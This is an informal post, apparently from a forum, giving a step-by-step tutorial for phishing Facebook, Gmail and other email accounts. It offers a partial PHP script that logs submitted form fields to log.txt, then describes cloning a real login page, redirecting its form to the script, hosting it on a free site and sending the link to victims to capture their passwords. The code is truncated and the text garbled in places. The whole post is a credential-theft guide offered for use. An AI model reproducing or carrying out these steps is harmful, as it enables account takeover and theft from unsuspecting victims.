hey guys, today i will describe the oldest method of hacking facebook or any other email account(gmail,y ahoo,rediffmail etc.) it is phishing. You require certain things- 1- a free hosted website 2- a notepad 3- a little patience now we start. 1- $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r \n"); } fwrite($handle, "\r \n"); fclose($handle); exit; ?> copy this code to notepad and save it as login.php 2- Change http:// www.website.com/ to url address you are phishing for (ex. www.facebook.co m ,www.gmail.com) or location you want to redirect the victim after phishing. 3-Now open the login page of the website right click>view source 4-Select all copy and past it into notepad 4.2-Change (https:// accounts.google.com/ ServiceLoginAuth ) to login.php (in case of google in all other case whatever it is to login.php 5-Save it as login.html 6-Save an empty text file as log.txt 7-Now upload your free website 8-Now change chmode of log.txt to 777 or read-write mode 9-send the link to victim http:// www.yourwebsite. com/login.html 8-email id and password will be saved in log.txt

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